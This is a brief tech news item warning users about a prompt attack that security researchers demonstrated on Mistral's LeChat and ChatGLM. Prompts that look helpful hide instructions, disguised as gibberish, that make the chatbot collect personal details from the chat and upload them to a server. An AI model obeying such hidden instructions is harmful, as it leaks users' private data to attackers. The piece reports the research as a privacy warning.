LLM

The Risks of Including Personal Details in AI Chats

PSA: Here's another reason not to include personal details in AI chats
By Blip Tech 1 min read

Security researchers have discovered a way to instruct AI chatbots to gather personal data from conversations and upload it to a server, raising concerns about privacy and security in AI chats. The researchers tested the method on two large language models, LeChat by French AI company Mistral and Chinese chatbot ChatGLM, and found that users could be offered seemingly helpful prompts which secretly contain malicious instructions obfuscated as gibberish only understandable by the AI. Experts warn that as more people use AI assistants and grant them greater authority over their activities, these kinds of attacks are likely to become more widespread.

#LLM

Latest News

About Blip Tech

Blip Tech is your go-to source for fast, reliable technology news. We cover everything from the latest Apple and Google announcements to breakthroughs in artificial intelligence, new smartphone releases, computer hardware, and everyday tech tips and how-tos. Our mission is to keep you informed without the fluff — just the news you need, delivered clearly and concisely.